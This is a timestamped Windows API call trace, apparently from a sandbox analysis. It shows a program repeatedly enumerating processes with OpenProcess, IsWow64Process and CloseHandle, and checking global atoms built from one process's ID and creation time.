	[0118.726] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x698
	[0118.726] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.726] CloseHandle (hObject=0x698) returned 1
	[0118.726] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0118.726] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0118.726] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x698
	[0118.726] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.726] CloseHandle (hObject=0x698) returned 1
	[0118.726] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0118.727] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x698
	[0118.727] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.727] CloseHandle (hObject=0x698) returned 1
	[0118.727] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x698
	[0118.727] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.727] CloseHandle (hObject=0x698) returned 1
	[0118.727] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x698
	[0118.727] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.727] CloseHandle (hObject=0x698) returned 1
	[0118.727] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x698
	[0118.727] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.727] CloseHandle (hObject=0x698) returned 1
	[0118.728] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x698
	[0118.728] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.728] CloseHandle (hObject=0x698) returned 1
	[0118.728] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x698
	[0118.728] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.728] CloseHandle (hObject=0x698) returned 1
	[0118.728] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0118.728] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x698
	[0118.729] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.729] CloseHandle (hObject=0x698) returned 1
	[0118.729] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x698
	[0118.729] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.729] CloseHandle (hObject=0x698) returned 1
	[0118.729] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x698
	[0118.729] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.729] CloseHandle (hObject=0x698) returned 1
	[0118.729] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x698
	[0118.729] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.729] CloseHandle (hObject=0x698) returned 1
	[0118.729] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x698
	[0118.729] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.729] CloseHandle (hObject=0x698) returned 1
	[0118.730] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x698
	[0118.730] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.730] CloseHandle (hObject=0x698) returned 1
	[0118.730] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x698
	[0118.730] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.730] CloseHandle (hObject=0x698) returned 1
	[0118.730] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x698
	[0118.730] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.730] CloseHandle (hObject=0x698) returned 1
	[0118.730] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x698
	[0118.730] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.730] CloseHandle (hObject=0x698) returned 1
	[0118.730] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x698
	[0118.730] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.731] CloseHandle (hObject=0x698) returned 1
	[0118.731] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x698
	[0118.731] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.731] CloseHandle (hObject=0x698) returned 1
	[0118.731] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x698
	[0118.731] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.731] CloseHandle (hObject=0x698) returned 1
	[0118.731] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x698
	[0118.731] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.731] CloseHandle (hObject=0x698) returned 1
	[0118.731] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x698
	[0118.731] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.731] CloseHandle (hObject=0x698) returned 1
	[0118.732] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x698
	[0118.732] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.732] CloseHandle (hObject=0x698) returned 1
	[0118.732] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x698
	[0118.732] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.732] CloseHandle (hObject=0x698) returned 1
	[0118.732] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x698
	[0118.732] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.732] CloseHandle (hObject=0x698) returned 1
	[0118.732] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x698
	[0118.732] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.732] CloseHandle (hObject=0x698) returned 1
	[0118.732] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x698
	[0118.732] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.732] CloseHandle (hObject=0x698) returned 1
	[0118.733] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x698
	[0118.733] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.733] CloseHandle (hObject=0x698) returned 1
	[0118.733] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x698
	[0118.733] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.733] CloseHandle (hObject=0x698) returned 1
	[0118.733] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x698
	[0118.733] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.733] CloseHandle (hObject=0x698) returned 1
	[0118.733] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0118.733] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.733] CloseHandle (hObject=0x698) returned 1
	[0118.733] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0118.734] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0118.734] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0118.734] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0118.734] wsprintfA (in: param_1=0x39936c8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0118.735] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0118.735] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0118.735] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0118.735] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0118.735] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0118.735] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0118.735] CloseHandle (hObject=0x698) returned 1
	[0118.735] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0118.736] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x698
	[0118.736] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.736] CloseHandle (hObject=0x698) returned 1
	[0118.736] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x698
	[0118.736] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.736] CloseHandle (hObject=0x698) returned 1
	[0118.736] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x698
	[0118.736] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.736] CloseHandle (hObject=0x698) returned 1
	[0118.769] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0118.769] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0118.769] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0118.770] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0118.770] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0118.770] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0118.770] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0118.770] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0118.770] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0118.770] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0118.771] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0118.771] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0118.771] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0118.771] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0118.771] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0118.771] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0118.771] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0118.772] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0118.772] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x698
	[0118.772] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.772] CloseHandle (hObject=0x698) returned 1
	[0118.772] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0118.772] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0118.772] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x698
	[0118.772] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.772] CloseHandle (hObject=0x698) returned 1
	[0118.773] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0118.773] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x698
	[0118.773] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.773] CloseHandle (hObject=0x698) returned 1
	[0118.773] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x698
	[0118.773] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.773] CloseHandle (hObject=0x698) returned 1
	[0118.773] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x698
	[0118.773] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.773] CloseHandle (hObject=0x698) returned 1
	[0118.773] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x698
	[0118.773] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.773] CloseHandle (hObject=0x698) returned 1
	[0118.774] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x698
	[0118.774] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.774] CloseHandle (hObject=0x698) returned 1
	[0118.774] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x698
	[0118.774] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.774] CloseHandle (hObject=0x698) returned 1
	[0118.774] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0118.774] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x698
	[0118.774] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.774] CloseHandle (hObject=0x698) returned 1
	[0118.774] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x698
	[0118.774] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.774] CloseHandle (hObject=0x698) returned 1
	[0118.775] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x698
	[0118.775] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.775] CloseHandle (hObject=0x698) returned 1
	[0118.775] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x698
	[0118.775] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.775] CloseHandle (hObject=0x698) returned 1
	[0118.775] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x698
	[0118.775] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.775] CloseHandle (hObject=0x698) returned 1
	[0118.775] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x698
	[0118.775] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.775] CloseHandle (hObject=0x698) returned 1
	[0118.775] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x698
	[0118.776] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.776] CloseHandle (hObject=0x698) returned 1
	[0118.776] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x698
	[0118.776] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.776] CloseHandle (hObject=0x698) returned 1
	[0118.776] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x698
	[0118.776] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.776] CloseHandle (hObject=0x698) returned 1
	[0118.776] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x698
	[0118.776] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.776] CloseHandle (hObject=0x698) returned 1
	[0118.776] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x698
	[0118.776] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.776] CloseHandle (hObject=0x698) returned 1
	[0118.777] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x698
	[0118.777] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.777] CloseHandle (hObject=0x698) returned 1
	[0118.777] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x698
	[0118.777] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.777] CloseHandle (hObject=0x698) returned 1
	[0118.777] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x698
	[0118.777] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.777] CloseHandle (hObject=0x698) returned 1
	[0118.777] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x698
	[0118.777] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.777] CloseHandle (hObject=0x698) returned 1
	[0118.778] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x698
	[0118.778] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.778] CloseHandle (hObject=0x698) returned 1
	[0118.778] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x698
	[0118.778] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.778] CloseHandle (hObject=0x698) returned 1
	[0118.778] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x698
	[0118.778] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.779] CloseHandle (hObject=0x698) returned 1
	[0118.779] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x698
	[0118.779] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.779] CloseHandle (hObject=0x698) returned 1
	[0118.779] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x698
	[0118.779] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.779] CloseHandle (hObject=0x698) returned 1
	[0118.779] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x698
	[0118.779] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.779] CloseHandle (hObject=0x698) returned 1
	[0118.779] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x698
	[0118.779] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.779] CloseHandle (hObject=0x698) returned 1
	[0118.780] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0118.780] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.780] CloseHandle (hObject=0x698) returned 1
	[0118.780] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0118.780] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0118.780] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0118.780] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0118.780] wsprintfA (in: param_1=0x3993380, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0118.781] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0118.781] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0118.781] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0118.781] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0118.781] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0118.781] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0118.781] CloseHandle (hObject=0x698) returned 1
	[0118.781] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0118.782] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x698
	[0118.782] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.782] CloseHandle (hObject=0x698) returned 1
	[0118.782] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x698
	[0118.782] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.782] CloseHandle (hObject=0x698) returned 1
	[0118.782] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x698
	[0118.782] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.782] CloseHandle (hObject=0x698) returned 1
	[0118.816] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0118.816] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0118.817] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0118.817] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0118.817] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0118.817] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0118.817] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0118.817] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0118.818] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0118.818] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0118.818] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0118.818] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0118.819] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0118.819] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0118.819] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0118.819] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0118.819] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0118.819] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0118.820] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x698
	[0118.820] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.820] CloseHandle (hObject=0x698) returned 1
	[0118.820] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0118.820] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0118.820] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x698
	[0118.820] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.820] CloseHandle (hObject=0x698) returned 1
	[0118.820] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0118.820] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x698
	[0118.820] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.821] CloseHandle (hObject=0x698) returned 1
	[0118.821] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x698
	[0118.821] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.821] CloseHandle (hObject=0x698) returned 1
	[0118.821] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x698
	[0118.821] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.821] CloseHandle (hObject=0x698) returned 1
	[0118.821] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x698
	[0118.821] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.821] CloseHandle (hObject=0x698) returned 1
